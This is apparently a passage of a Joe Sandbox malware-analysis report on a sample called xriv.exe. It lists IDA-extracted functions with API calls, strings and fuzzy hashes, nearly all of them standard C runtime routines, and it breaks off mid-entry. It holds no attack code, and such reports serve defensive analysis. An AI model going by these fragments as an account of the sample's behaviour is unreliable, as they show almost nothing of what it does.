                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 3f3e00f0c8e48078f8adb7e6205a3abe4c6997d6e252ee8548c171130102d65d
                            • Instruction ID: c8d10410dac8ed6da960bbd24e5b502b2f3e9c69b3dc6d4935200b641eb3965b
                            • Opcode Fuzzy Hash: 3f3e00f0c8e48078f8adb7e6205a3abe4c6997d6e252ee8548c171130102d65d
                            • Instruction Fuzzy Hash: B9417034A00219EBCF20DF6DC888A9EBFB5AF5533CF148195DA189B351D7399A05CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: api-ms-$ext-ms-
                            • API String ID: 0-537541572
                            • Opcode ID: 67d97acbdacd0e74b2d1fa322970a25adbaa4bd15bb8082537105a4441bc0c97
                            • Instruction ID: 28f1ebd7929cff0619fdf1487960c8a81e5b031687a337d27f641061b4d03b98
                            • Opcode Fuzzy Hash: 67d97acbdacd0e74b2d1fa322970a25adbaa4bd15bb8082537105a4441bc0c97
                            • Instruction Fuzzy Hash: 8E21EB72A41325AFEB326769DC84A5E3B5C9F15768F1506B4ED05BB684EA38D80087D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 01381405: _free.LIBCMT ref: 0138142A
                            • _free.LIBCMT ref: 0138148B
                              • Part of subcall function 0137D653: HeapFree.KERNEL32(00000000,00000000,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?), ref: 0137D669
                              • Part of subcall function 0137D653: GetLastError.KERNEL32(?,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?,?), ref: 0137D67B
                            • _free.LIBCMT ref: 01381496
                            • _free.LIBCMT ref: 013814A1
                            • _free.LIBCMT ref: 013814F5
                            • _free.LIBCMT ref: 01381500
                            • _free.LIBCMT ref: 0138150B
                            • _free.LIBCMT ref: 01381516
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                            • Instruction ID: 57f1a5a70c60786db3af54e5b8ec37652309825c551b91b8a872dc24ad7a876d
                            • Opcode Fuzzy Hash: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                            • Instruction Fuzzy Hash: 53118172540B09AED670BFB9CC05FCB77AC9F10709F814815A29FBB050DA2CB546C694
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetConsoleCP.KERNEL32(?,01365140,00000000), ref: 01382B40
                            • __fassign.LIBCMT ref: 01382D1F
                            • __fassign.LIBCMT ref: 01382D3C
                            • WriteFile.KERNEL32(?,01365140,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01382D84
                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01382DC4
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 01382E70
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileWrite__fassign$ConsoleErrorLast
                            • String ID:
                            • API String ID: 4031098158-0
                            • Opcode ID: 7e51717dd878f44d3de515fa0361909e20995e89a031f58e91e3b01707d75138
                            • Instruction ID: bac93ca96b713b0912ed696ef4300661d678c20fcc50fdddf63883e87bded951
                            • Opcode Fuzzy Hash: 7e51717dd878f44d3de515fa0361909e20995e89a031f58e91e3b01707d75138
                            • Instruction Fuzzy Hash: 15D1BC71D002589FDF15DFE8C8809EEBBB5BF48318F28016AE859BB241D731AA46CF54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetLastError.KERNEL32(?,?,01378887,01378476,01377AC4), ref: 0137889E
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 013788AC
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 013788C5
                            • SetLastError.KERNEL32(00000000,01378887,01378476,01377AC4), ref: 01378917
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastValue___vcrt_
                            • String ID:
                            • API String ID: 3852720340-0
                            • Opcode ID: 55309400f491bfa37ea9db4ad6165cb6bbdceadc4c7ef0b60c9a00ff711f9fa0
                            • Instruction ID: 2741ed53cee947b262a9767b30e3a922ae10d7b8f3b223a51bd66af9543e3ffa
                            • Opcode Fuzzy Hash: 55309400f491bfa37ea9db4ad6165cb6bbdceadc4c7ef0b60c9a00ff711f9fa0
                            • Instruction Fuzzy Hash: AA01283251A3177EF631267D7C88A1B2A9CEF427FDB2003AAE120A05D8EE1A48104340
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, xrefs: 01380033
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            • API String ID: 0-3702952914
                            • Opcode ID: 3058ff3f5bd0e39671a7e797905bfd2cd961971263dab1c0fed919919b66158d
                            • Instruction ID: 3b935b9bc40691dfb194caea0df7029d3786ce441910919855adc282a085002e
                            • Opcode Fuzzy Hash: 3058ff3f5bd0e39671a7e797905bfd2cd961971263dab1c0fed919919b66158d
                            • Instruction Fuzzy Hash: 272192B160430AAFEB35BF698C8096BB7ADEF0036D7104524F92596291EB35EC4687A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: _wcsrchr
                            • String ID: .bat$.cmd$.com$.exe
                            • API String ID: 1752292252-4019086052
                            • Opcode ID: a1835754be813542b7402e2146b826236e673b7bcaa1f30b74d1f8adc662b888
                            • Instruction ID: abaeb707fdd6fffdb65422498e5180f7e4ee815923d2e9ea01c5c64a13f8c310
                            • Opcode Fuzzy Hash: a1835754be813542b7402e2146b826236e673b7bcaa1f30b74d1f8adc662b888
                            • Instruction Fuzzy Hash: F801DB7B60471B65E734212D9C016279BBC8BD2ABC736002EFA54F7284EE5CD8035190
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: api-ms-
                            • API String ID: 0-2084034818
                            • Opcode ID: cdc1808c670423ec9f26ae03eeab71bed74be41e89ca9d5b01c06b78816e4df7
                            • Instruction ID: 5f8cde7767264ccf759e4ee2f85bd6304d60108c9ce8dd3d85058b960d31f4b4
                            • Opcode Fuzzy Hash: cdc1808c670423ec9f26ae03eeab71bed74be41e89ca9d5b01c06b78816e4df7
                            • Instruction Fuzzy Hash: 9411B972A05627ABFB328B29DC80B5E779C9B037BCF110720E905A7285E638ED00C7D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0137A9D8,0137E000,?,0137A9A0,0137AF26,?,0137E000), ref: 0137A9F8
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0137AA0B
                            • FreeLibrary.KERNEL32(00000000,?,?,0137A9D8,0137E000,?,0137A9A0,0137AF26,?,0137E000), ref: 0137AA2E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: dd172d42b3a52402ebc93934809b0dd529b82a2fe33521943ffd2907e474db99
                            • Instruction ID: f4ae072e79a0682acae03b4cf1c580499ad9a8ff57ad34c7e2abb1f5a1173b1d
                            • Opcode Fuzzy Hash: dd172d42b3a52402ebc93934809b0dd529b82a2fe33521943ffd2907e474db99
                            • Instruction Fuzzy Hash: 7FF01C71601319FBEB31AB55DE09BDE7FACEB4475EF140064EA05A2190CB788A11DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCPInfo.KERNEL32(01674790,01674790,?,7FFFFFFF,?,?,01386325,01674790,01674790,?,01674790,?,?,?,?,01674790), ref: 0138610C
                            • __alloca_probe_16.LIBCMT ref: 013861C2
                            • __alloca_probe_16.LIBCMT ref: 01386258
                            • __freea.LIBCMT ref: 013862C3
                            • __freea.LIBCMT ref: 013862CF
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: __alloca_probe_16__freea$Info
                            • String ID:
                            • API String ID: 2330168043-0
                            • Opcode ID: e6e7bcfe475785adee906e9c2d055aec88d8c92656773efefa1902f2b5f1810b
                            • Instruction ID: a3182c2542e1f045f02dec74c640a725e58f031c4224ae222985c86181c4c0b8
                            • Opcode Fuzzy Hash: e6e7bcfe475785adee906e9c2d055aec88d8c92656773efefa1902f2b5f1810b
                            • Instruction Fuzzy Hash: DE81A7F1D0031A9BEF21BF98C842AEE7BBADF5935CF180195E904A7242D625C941C7A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __alloca_probe_16.LIBCMT ref: 01384A18
                            • __alloca_probe_16.LIBCMT ref: 01384ADE
                            • __freea.LIBCMT ref: 01384B4A
                              • Part of subcall function 0137DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01378272,?,?,?,?,?,013620C3,?,?), ref: 0137DB6E
                            • __freea.LIBCMT ref: 01384B53
                            • __freea.LIBCMT ref: 01384B76
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                            • String ID:
                            • API String ID: 1423051803-0
                            • Opcode ID: 857ff1008832533d6a0694004a70708e0b2a295f217648808f1cd565f643dbf9
                            • Instruction ID: 393a1a761a117bc673a62bd3277a42b67c7cf80fe47862c837db542b6259bcdc
                            • Opcode Fuzzy Hash: 857ff1008832533d6a0694004a70708e0b2a295f217648808f1cd565f643dbf9
                            • Instruction Fuzzy Hash: 1051D57250031BAFEB326FA8DC40FBBBAA9DF55668F194129FD14AB540E734DD1086A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0137B0E0), ref: 0137B1D0
                            • GetFileInformationByHandle.KERNEL32(?,?), ref: 0137B22A
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0137B0E0,?,000000FF,00000000,00000000), ref: 0137B2B8
                            • __dosmaperr.LIBCMT ref: 0137B2BF
                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0137B2FC
                              • Part of subcall function 0137B524: __dosmaperr.LIBCMT ref: 0137B559
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                            • String ID:
                            • API String ID: 1206951868-0
                            • Opcode ID: a7752b92475b77a82c97e764c281820deebc4037202e9f6f4fb7d38ecbc89f59
                            • Instruction ID: de348fce65c463b6ea79fb9350497bcfc8b3adecd6355a41b2932e7afd9c815d
                            • Opcode Fuzzy Hash: a7752b92475b77a82c97e764c281820deebc4037202e9f6f4fb7d38ecbc89f59
                            • Instruction Fuzzy Hash: DA412A75900649AFDB34DFB9D8449AFFBF9EF89304B00452DE956D3614EB389940CB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _free.LIBCMT ref: 013813B4
                              • Part of subcall function 0137D653: HeapFree.KERNEL32(00000000,00000000,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?), ref: 0137D669
                              • Part of subcall function 0137D653: GetLastError.KERNEL32(?,?,0138142F,?,00000000,?,?,?,01381456,?,00000007,?,?,01381858,?,?), ref: 0137D67B
                            • _free.LIBCMT ref: 013813C6
                            • _free.LIBCMT ref: 013813D8
                            • _free.LIBCMT ref: 013813EA
                            • _free.LIBCMT ref: 013813FC
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 11a24ddf5cace416723f54ccf37d108d057886f79966d29cf4b222a03aee1d6c
                            • Instruction ID: 0b0f9377622444f6eab23711833f37e21bdac6d2bbd3c0191e5677b3f4ffb947
                            • Opcode Fuzzy Hash: 11a24ddf5cace416723f54ccf37d108d057886f79966d29cf4b222a03aee1d6c
                            • Instruction Fuzzy Hash: 9BF04932500305ABD630EFACE081C0A7BEDAE40B28BA48846E11DD7940CA35F8C18AA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID: *?
                            • API String ID: 269201875-2564092906
                            • Opcode ID: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                            • Instruction ID: c98912734fe170cc479f93c02ed5b4d5d02d1f5bb82fe9c3cf1242fdbbc5cf34
                            • Opcode Fuzzy Hash: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                            • Instruction Fuzzy Hash: 59612B76D0021A9FDF25DFADC8805EDFBF9FF48214B24816AD825E7304D675AE418B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: AdjustPointer
                            • String ID:
                            • API String ID: 1740715915-0
                            • Opcode ID: 5e572ae3224ee0b271c832c75e57c7be9e287ba742ac88e05a094bb65db308c8
                            • Instruction ID: 1254ef27076b088fa14b9f233c25258c414f5f020deaa093403209d0bc9b693e
                            • Opcode Fuzzy Hash: 5e572ae3224ee0b271c832c75e57c7be9e287ba742ac88e05a094bb65db308c8
                            • Instruction Fuzzy Hash: 6851C272604206AFFB39AF1CC888BBA7BA4FF0431DF1405ADDA0557691E739E980C791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetVersionExW.KERNEL32(0000011C,?,774AE603,00000000), ref: 01364D89
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01364DF0
                            • GetProcAddress.KERNEL32(00000000), ref: 01364DF7
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleModuleProcVersion
                            • String ID:
                            • API String ID: 3310240892-0
                            • Opcode ID: f9f470634acf3721eb90ab792a4983ea1fb09aa3706137a829ad8c5b0368011d
                            • Instruction ID: 4baf583c58d0e08bac4262af785b73fdb85e9b738ca56a342132be70e16327b7
                            • Opcode Fuzzy Hash: f9f470634acf3721eb90ab792a4983ea1fb09aa3706137a829ad8c5b0368011d
                            • Instruction Fuzzy Hash: 33512971D142189BEB24EF68CD487DDBB7DEB55318F5082A8E409A7385EB345A808B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _free.LIBCMT ref: 0138509E
                            • _free.LIBCMT ref: 013850C7
                            • SetEndOfFile.KERNEL32(00000000,013825FD,00000000,0137D4F0,?,?,?,?,?,?,?,013825FD,0137D4F0,00000000), ref: 013850F9
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,013825FD,0137D4F0,00000000,?,?,?,?,00000000), ref: 01385115
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFileLast
                            • String ID:
                            • API String ID: 1547350101-0
                            • Opcode ID: 4c4ed08f178d5ddbfd2debffb6504093afefd7ddf5efedfcb69e5a287bd908f6
                            • Instruction ID: 0aab032f5f97a3cda7b2607bd36a742c945aa599a2723b86be8489df4c371ef6
                            • Opcode Fuzzy Hash: 4c4ed08f178d5ddbfd2debffb6504093afefd7ddf5efedfcb69e5a287bd908f6
                            • Instruction Fuzzy Hash: 97412DB29003469BDB22BFBCCC40B9E7BB9EF54378F280510F925E7291E634C84247A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 0137AE0F: _free.LIBCMT ref: 0137AE1D
                              • Part of subcall function 01380971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,01384B40,?,00000000,00000000), ref: 01380A13
                            • GetLastError.KERNEL32 ref: 0137FA02
                            • __dosmaperr.LIBCMT ref: 0137FA09
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0137FA48
                            • __dosmaperr.LIBCMT ref: 0137FA4F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                            • String ID:
                            • API String ID: 167067550-0
                            • Opcode ID: 584124a64d68225fc5bb016a05cf1046d2fa0793f7710ff3cfb020df065bd735
                            • Instruction ID: 0f27f0ed46f2561467716d14c2abe6f94a331821a54deff12d3a2d05e77bb22c
                            • Opcode Fuzzy Hash: 584124a64d68225fc5bb016a05cf1046d2fa0793f7710ff3cfb020df065bd735
                            • Instruction Fuzzy Hash: 9F21867260420ABFEB31BF7D888096BB7ADFF0526C7144515F93997651EB38ED008B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetLastError.KERNEL32(?,00000000,?,0137AD8D,00000000,?,?,?,0137AF26,?), ref: 0137DF49
                            • _free.LIBCMT ref: 0137DFA6
                            • _free.LIBCMT ref: 0137DFDC
                            • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,0137AF26,?), ref: 0137DFE7
                            Memory Dump Source
                            • Source File: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, Offset: 01360000, based on PE: true
                            • Associated: 0000000B.00000002.318619511.0000000001360000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318662770.0000000001398000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 0000000B.00000002.318671227.000000000139D000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_1360000_xriv.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast_free
                            • String ID:
                            • API String ID: 2283115069-0
                            • Opcode ID: ad192d2fc295efd748d2ddd32e299c7ccce1dd4501a793dfe66375c97a2eed91
